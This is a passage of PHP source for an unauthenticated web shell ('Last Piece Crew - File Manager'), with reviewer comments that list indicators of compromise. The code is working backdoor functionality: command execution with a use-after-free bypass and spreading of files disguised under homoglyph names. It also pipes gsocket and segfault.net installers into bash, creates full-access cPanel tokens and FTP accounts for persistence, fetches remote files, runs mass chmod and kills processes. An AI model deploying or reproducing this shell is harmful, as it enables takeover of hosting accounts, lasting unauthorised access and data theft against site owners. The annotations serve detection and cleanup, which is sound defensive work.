            if (!is_array($files)) {
                $errors[] = $dir;
                continue;
            }
            $existingFiles = [];
            foreach ($files as $f) {
                if ($f === '.' || $f === '..') continue;
                if (is_file($dir . '/' . $f)) {
                    $fext = strtolower(pathinfo($f, PATHINFO_EXTENSION));
                    if (in_array($fext, $targetExts)) $existingFiles[] = $f;
                }
            }
            if (empty($existingFiles)) {
                $existingFiles = ['index.php', 'config.php', 'class-loader.php'];
            }
            $placed = false;
            foreach ($existingFiles as $origFile) {
                $variants = generateHomoglyph($origFile);
                foreach ($variants as $variant) {
                    $targetPath = $dir . '/' . $variant;
                    if (!file_exists($targetPath)) {
                        if (@file_put_contents($targetPath, $content) !== false) {
                            $count++;
                            $created[] = $targetPath;
                            $placed = true;
                            // One file per directory: leave both loops after the first success.
                            break 2;
                        }
                    }
                }
            }
            if (!$placed) $errors[] = $dir;
        }
    } catch (Exception $e) {
        $errors[] = 'Exception: ' . $e->getMessage();
    }
    return ['count' => $count, 'errors' => $errors, 'created' => $created];
}

// === HANDLE REQUESTS ===
// NOTE(review): every handler below is driven directly by request parameters and none
// checks identity. The parameter names are usable as web-log / WAF search terms.
$currentDirectory = getCurrentDirectory();
$errorMessage = '';
$responseMessage = '';
$cmdOutput = '';
$loginError = '';

// `lph`: change the working directory to any path the PHP user can enter.
if (isset($_GET['lph'])) {
    @chdir($_GET['lph']);
    $currentDirectory = getCurrentDirectory();
}

if (isset($_POST['multi_upload'])) {
    $responseMessage = uploadMultipleFiles($currentDirectory);
}

if (isset($_POST['newfolder']) && !empty($_POST['foldername'])) {
    $newDir = $currentDirectory . '/' . $_POST['foldername'];
    fixPermission($currentDirectory);
    if (@mkdir($newDir, 0755)) $responseMessage = 'Folder created.';
    else $responseMessage = 'Failed to create folder.';
}

// `mass_chmod`: recursively applies the requested octal modes to every directory and
// file under `chmod_path` (default: current directory).
if (isset($_POST['mass_chmod']) && !empty($_POST['chmod_folder']) && !empty($_POST['chmod_file'])) {
    $folderPerm = $_POST['chmod_folder'];
    $filePerm = $_POST['chmod_file'];
    $targetPath = !empty($_POST['chmod_path']) ? $_POST['chmod_path'] : $currentDirectory;
    $folderCount = 0;
    $fileCount = 0;
    $chmodErrors = [];
    try {
        $iterator = new RecursiveIteratorIterator(
            new RecursiveDirectoryIterator($targetPath, RecursiveDirectoryIterator::SKIP_DOTS),
            RecursiveIteratorIterator::SELF_FIRST
        );
        foreach ($iterator as $item) {
            $path = $item->getPathname();
            if ($item->isDir()) {
                if (@chmod($path, octdec($folderPerm))) $folderCount++;
                else $chmodErrors[] = $path;
            } else {
                if (@chmod($path, octdec($filePerm))) $fileCount++;
                else $chmodErrors[] = $path;
            }
        }
        // The root itself is counted as a folder even if this chmod fails.
        @chmod($targetPath, octdec($folderPerm));
        $folderCount++;
        $cmdOutput = "=== Mass Chmod Result ===\nTarget: $targetPath\nFolder Perm: $folderPerm\nFile Perm: $filePerm\n---\nFolders: $folderCount\nFiles: $fileCount";
        if (count($chmodErrors) > 0) {
            $cmdOutput .= "\nErrors: " . count($chmodErrors);
            foreach (array_slice($chmodErrors, 0, 5) as $err) $cmdOutput .= "\n $err";
        }
        $responseMessage = 'Mass chmod completed.';
    } catch (Exception $e) {
        $cmdOutput = "Error: " . $e->getMessage();
    }
}

// `mass_spread`: see massSpreadAuto(); the written content comes from the request.
if (isset($_POST['mass_spread']) && !empty($_POST['spread_content'])) {
    $spreadContent = $_POST['spread_content'];
    $result = massSpreadAuto($currentDirectory, $spreadContent);
    $cmdOutput = "=== Mass Spread Result ===\nStarting from: $currentDirectory\nFiles created: " . $result['count'];
    if (count($result['created']) > 0) {
        $cmdOutput .= "\n\nCreated files:";
        foreach (array_slice($result['created'], 0, 20) as $c) $cmdOutput .= "\n " . basename($c) . " -> " . dirname($c);
    }
    if (count($result['errors']) > 0) {
        $cmdOutput .= "\n\nFailed dirs: " . count($result['errors']);
        foreach (array_slice($result['errors'], 0, 5) as $err) $cmdOutput .= "\n $err";
    }
    $responseMessage = 'Mass spread completed: ' . $result['count'] . ' files created.';
}

// `gsocket_action`: downloads and runs third-party installer scripts with bash.
// NOTE(review): network indicators present in this handler are gsocket.io and
// nossl.segfault.net (fetched over plain HTTP), plus the temp file /tmp/deploy-all.sh
// and a retry with GS_PORT=53. The temp file is deleted afterwards, so rely on proxy,
// DNS and process logs rather than the file system.
if (isset($_POST['gsocket_action']) && isset($_POST['gsocket_cmd'])) {
    $gsCmd = $_POST['gsocket_cmd'];
    $cmdOutput = "=== GSSocket ===\n\n";
    if ($gsCmd === 'install') {
        // Step 1: try gsocket.io
        $out = runCmd('curl -fsSL https://gsocket.io/y | bash');
        if (!empty(trim($out ?? ''))) {
            $cmdOutput .= "[1] gsocket.io (curl):\n" . $out;
        } else {
            $out = runCmd('wget --no-verbose -O- https://gsocket.io/y | bash');
            if (!empty(trim($out ?? ''))) {
                $cmdOutput .= "[1] gsocket.io (wget):\n" . $out;
            } else {
                $cmdOutput .= "[1] gsocket.io: No output.\n";
            }
        }
        // Step 2: fallback segfault.net
        $out2 = runCmd('curl -fsSL http://nossl.segfault.net/deploy-all.sh -o /tmp/deploy-all.sh && bash /tmp/deploy-all.sh');
        if (!empty(trim($out2 ?? ''))) {
            $cmdOutput .= "\n\n[2] segfault.net deploy:\n" . $out2;
        } else {
            $cmdOutput .= "\n\n[2] segfault.net deploy: No output.";
        }
        // Step 3: fallback port 53
        $out3 = runCmd('GS_PORT=53 bash /tmp/deploy-all.sh');
        if (!empty(trim($out3 ?? ''))) {
            $cmdOutput .= "\n\n[3] GS_PORT=53 deploy:\n" . $out3;
        } else {
            $cmdOutput .= "\n\n[3] GS_PORT=53 deploy: No output.";
        }
        // Cleanup
        @unlink('/tmp/deploy-all.sh');
        runCmd('rm -f /tmp/deploy-all.sh');
        $responseMessage = 'GSSocket install chain executed.';
    } elseif ($gsCmd === 'uninstall') {
        $out = runCmd('GS_UNDO=1 bash -c "$(curl -fsSL https://gsocket.io/y)" 2>&1');
        if (empty(trim($out ?? ''))) {
            $out = runCmd('GS_UNDO=1 bash -c "$(wget --no-verbose -O- https://gsocket.io/y)" 2>&1');
        }
        // Auto kill all user processes
        runCmd('pkill -u $(whoami) 2>/dev/null');
        runCmd('rm -f /tmp/deploy-all.sh');
        // Clean output - remove the "Use pkill" instruction line
        $out = preg_replace('/-->.*pkill defunct.*/i', '', $out ?? '');
        $out = trim($out);
        $out .= "\nAll user processes killed.";
        $cmdOutput .= $out;
        $responseMessage = 'GSSocket uninstall executed.';
    }
}

// `cpanel_token`: asks uapi for a full-access API token under a random name and shows it
// with the host name and account user.
// NOTE(review): such a token keeps working after the shell file is removed. Review and
// revoke cPanel API tokens during cleanup; names created here start with "lp" followed
// by 8 hex characters.
if (isset($_POST['cpanel_token'])) {
    $randomName = 'lp' . substr(md5(uniqid(mt_rand(), true)), 0, 8);
    $uapiOutput = runUapi('Tokens create_full_access name=' . $randomName);
    $serverDomain = $_SERVER['HTTP_HOST'] ?? $_SERVER['SERVER_NAME'] ?? 'unknown';
    $serverDomain = preg_replace('/^https?:\/\//', '', $serverDomain);
    $serverDomain = rtrim($serverDomain, '/');
    $serverUser = trim(runCmd('whoami') ?? get_current_user());
    $token = '';
    if ($uapiOutput && preg_match('/token:\s*[\'"]?([A-Z0-9]+)[\'"]?/i', $uapiOutput, $m)) {
        $token = $m[1];
    }
    $cmdOutput = "=== cPanel Token Generated ===\n\n";
    if (!empty($token)) {
        $cmdOutput .= "Login : https://" . $serverDomain . ":2083/\n";
        $cmdOutput .= "Domain : " . $serverDomain . "\n";
        $cmdOutput .= "User : " . $serverUser . "\n";
        $cmdOutput .= "Token : " . $token . "\n";
        $cmdOutput .= "\n=== Copy Format ===\n";
        $cmdOutput .= $serverDomain . "|" . $serverUser . "|" . $token;
        $responseMessage = 'cPanel token created successfully';
    } else {
        $cmdOutput .= "FAILED to create token.\n\n";
        $cmdOutput .= "Raw output:\n" . ($uapiOutput ?: 'No output from uapi');
        $responseMessage = 'Token creation failed';
    }
}

// FTP account management through uapi: list, add, change password, delete.
// NOTE(review): FTP accounts added or re-passworded here are another access path that
// outlives the shell; audit them during cleanup.
$ftpAccounts = [];
if (isset($_POST['ftp_list']) || isset($_POST['ftp_add']) || isset($_POST['ftp_passwd']) || isset($_POST['ftp_delete'])) {
    $ftpListRaw = runUapi('Ftp list_ftp');
    $ftpAccounts = parseUapiFtpList($ftpListRaw);
}
if (isset($_POST['ftp_list'])) {
    $responseMessage = count($ftpAccounts) . ' FTP account(s) found.';
}
if (isset($_POST['ftp_add']) && !empty($_POST['ftp_user']) && !empty($_POST['ftp_pass'])) {
    $ftpUser = $_POST['ftp_user'];
    $ftpPass = $_POST['ftp_pass'];
    $ftpQuota = !empty($_POST['ftp_quota']) ? $_POST['ftp_quota'] : '0';
    // The new account's home directory is the hosting account's own home directory.
    $homeDir = getenv('HOME') ?: ('/home/' . get_current_user());
    $addOutput = runUapi('Ftp add_ftp user=' . escapeshellarg($ftpUser) . ' pass=' . escapeshellarg($ftpPass) . ' quota=' . escapeshellarg($ftpQuota) . ' homedir=' . escapeshellarg($homeDir));
    $parsed = parseUapiStatus($addOutput);
    if ($parsed['ok']) {
        $responseMessage = 'FTP account "' . $ftpUser . '" created successfully.';
    } else {
        $errorMessage = 'FTP creation failed. Check output.';
        $cmdOutput = $addOutput;
    }
}
if (isset($_POST['ftp_passwd']) && !empty($_POST['ftp_chg_user']) && !empty($_POST['ftp_chg_pass']) && !empty($_POST['ftp_chg_domain'])) {
    $chgUser = $_POST['ftp_chg_user'];
    $chgPass = $_POST['ftp_chg_pass'];
    $chgDomain = $_POST['ftp_chg_domain'];
    $passwdOutput = runUapi('Ftp passwd user=' . escapeshellarg($chgUser) . ' domain=' . escapeshellarg($chgDomain) . ' pass=' . escapeshellarg($chgPass));
    $parsed = parseUapiStatus($passwdOutput);
    if ($parsed['ok']) {
        $responseMessage = 'Password changed for "' . $chgUser . '@' . $chgDomain . '".';
    } else {
        $errorMessage = 'Password change failed.';
        $cmdOutput = $passwdOutput;
    }
}
if (isset($_POST['ftp_delete']) && !empty($_POST['ftp_del_user']) && !empty($_POST['ftp_del_domain'])) {
    $delUser = $_POST['ftp_del_user'];
    $delDomain = $_POST['ftp_del_domain'];
    $delOutput = runUapi('Ftp delete_ftp user=' . escapeshellarg($delUser) . ' domain=' . escapeshellarg($delDomain));
    $parsed = parseUapiStatus($delOutput);
    if ($parsed['ok']) {
        $responseMessage = 'FTP account "' . $delUser . '@' . $delDomain . '" deleted.';
    } else {
        $errorMessage = 'FTP deletion failed.';
        $cmdOutput = $delOutput;
    }
}

// === WORDPRESS MANAGER ===
$wpAvailable = false;
$wpLoadPath = findWpLoad();
if ($wpLoadPath) $wpAvailable = true;

// `remote_upload`: fetches an arbitrary URL server-side and writes it into the current
// directory. The curl fallback follows redirects with certificate verification off.
if (isset($_POST['remote_upload']) && !empty($_POST['remote_url'])) {
    $url = $_POST['remote_url'];
    $fname = !empty($_POST['remote_filename']) ? $_POST['remote_filename'] : basename(parse_url($url, PHP_URL_PATH));
    $target = $currentDirectory . '/' . $fname;
    fixPermission($currentDirectory);
    $content = @file_get_contents($url);
    if ($content === false && function_exists('curl_init')) {
        $ch = curl_init($url);
        curl_setopt_array($ch, [CURLOPT_RETURNTRANSFER=>true,CURLOPT_FOLLOWLOCATION=>true,CURLOPT_TIMEOUT=>30,CURLOPT_SSL_VERIFYPEER=>false]);
        $content = curl_exec($ch);
        curl_close($ch);
    }
    if ($content !== false && @file_put_contents($target, $content) !== false) $responseMessage = "Remote file downloaded: $fname";
    else $responseMessage = 'Failed to download remote file.';
}

// `edit`: read any file the PHP user can read; on POST, overwrite it with `content`.
if (isset($_GET['edit'])) {
    $file = $_GET['edit'];
    $content = readFileContent($file);
    if ($_SERVER['REQUEST_METHOD'] === 'POST' && isset($_POST['content'])) {
        if (saveFileContent($file)) $responseMessage = 'File saved.';
        else $errorMessage = 'Error saving file.';
    }
}

// `chmod`: set an octal mode (parsed base 8) on an arbitrary path.
if (isset($_GET['chmod'])) {
    $file = $_GET['chmod'];
    if ($_SERVER['REQUEST_METHOD'] === 'POST' && isset($_POST['permission'])) {
        $perm = intval($_POST['permission'], 8);
        if ($perm > 0 && @chmod($file, $perm)) $responseMessage = 'Permission changed.';
        else $errorMessage = 'Error changing permission.';
    }
}

if (isset($_POST['upload'])) {
    $responseMessage = uploadFile($currentDirectory);
}

// `cmd`: command execution; `use_bypass=1` goes straight to the Pwn path.
if (isset($_POST['cmd']) && !empty($_POST['cmd'])) {
    $useBypass = isset($_POST['use_bypass']) && $_POST['use_bypass'] === '1';
    if ($useBypass) {
        $bypassOut = runBypass($_POST['cmd']);
        $cmdOutput = $bypassOut ?: 'Bypass returned no output. UAF may not work on this PHP version.';
    } else {
        $cmdOutput = executeCommand($_POST['cmd']);
    }
}

// `eclipse`: same as `cmd` with the bypass path forced.
if (isset($_POST['eclipse']) && !empty($_POST['eclipse'])) {
    $bypassOut = runBypass($_POST['eclipse']);
    $cmdOutput = $bypassOut ?: 'Bypass returned no output. UAF may not work on this PHP version.';
}

if (isset($_GET['rename']) && $_SERVER['REQUEST_METHOD'] === 'POST' && isset($_POST['new_name'])) {
    $file = $_GET['rename'];
    $responseMessage = renameFile($file, $_POST['new_name']);
}

// `del`: deletion is triggered by a GET request alone.
if (isset($_GET['del'])) {
    $file = $_GET['del'];
    $fileDir = dirname($file);
    if (deleteFile($file)) {
        header('Location: ?lph=' . urlencode($fileDir) . '&msg=deleted');
        exit;
    } else {
        $errorMessage = 'Failed to delete: ' . basename($file);
    }
}

// `Summon`: downloads Adminer 4.8.1 from GitHub into the current directory as Adminer.php.
// NOTE(review): an unexpected Adminer.php in a web root is a database-access tool left
// behind by this shell and should be removed with it.
if (isset($_POST['Summon'])) {
    $url = 'https://github.com/vrana/adminer/releases/download/v4.8.1/adminer-4.8.1.php';
    $filePath = $currentDirectory . '/Adminer.php';
    $fileContent = @file_get_contents($url);
    if ($fileContent !== false && @file_put_contents($filePath, $fileContent) !== false) {
        $responseMessage = 'Adminer summoned successfully.';
    } else {
        $errorMessage = 'Failed to summon Adminer.';
    }
}

if (isset($_POST['scan_deeply'])) {
    $results = scanDeepestDirectory($currentDirectory);
    $cmdOutput = "=== Deepest Directories ===\n";
    if (empty($results)) $cmdOutput .= "No subdirectories found.";
    else foreach ($results as $r) $cmdOutput .= $r . "\n";
}

if (isset($_POST['scan_newly'])) {
    $ext = isset($_POST['scan_ext']) ? $_POST['scan_ext'] : 'php';
    $results = scanNewlyFiles($currentDirectory, $ext);
    $cmdOutput = "=== Newest .$ext Files ===\n";
    if (empty($results)) $cmdOutput .= "No files found.";
    else foreach ($results as $r) $cmdOutput .= date('Y-m-d H:i:s', $r['time']) . " | " . $r['path'] . "\n";
}

if (isset($_GET['msg']) && $_GET['msg'] === 'deleted') {
    $responseMessage = 'Item deleted successfully.';
}

// Bypass security modules
// NOTE(review): on LiteSpeed, when the request carries an X-LSCACHE header, the response
// sets "X-LSCACHE: off"; what that achieves server-side is not shown here.
if (function_exists('litespeed_request_headers')) {
    $headers = litespeed_request_headers();
    if (isset($headers['X-LSCACHE'])) header('X-LSCACHE: off');
}
?> Last Piece Crew - File Manager
← Back

Editing:

Cancel

Rename:

Cancel

Chmod:

Cancel
Last Piece
File Manager v1.0
No Auth
Features
Scanner
Tools
$
Exec: | Bypass: UAF PHP | Disabled: 60 ? '...' : '') : 'None'; ?>
Name Type Size Permission Actions
No files or folders found.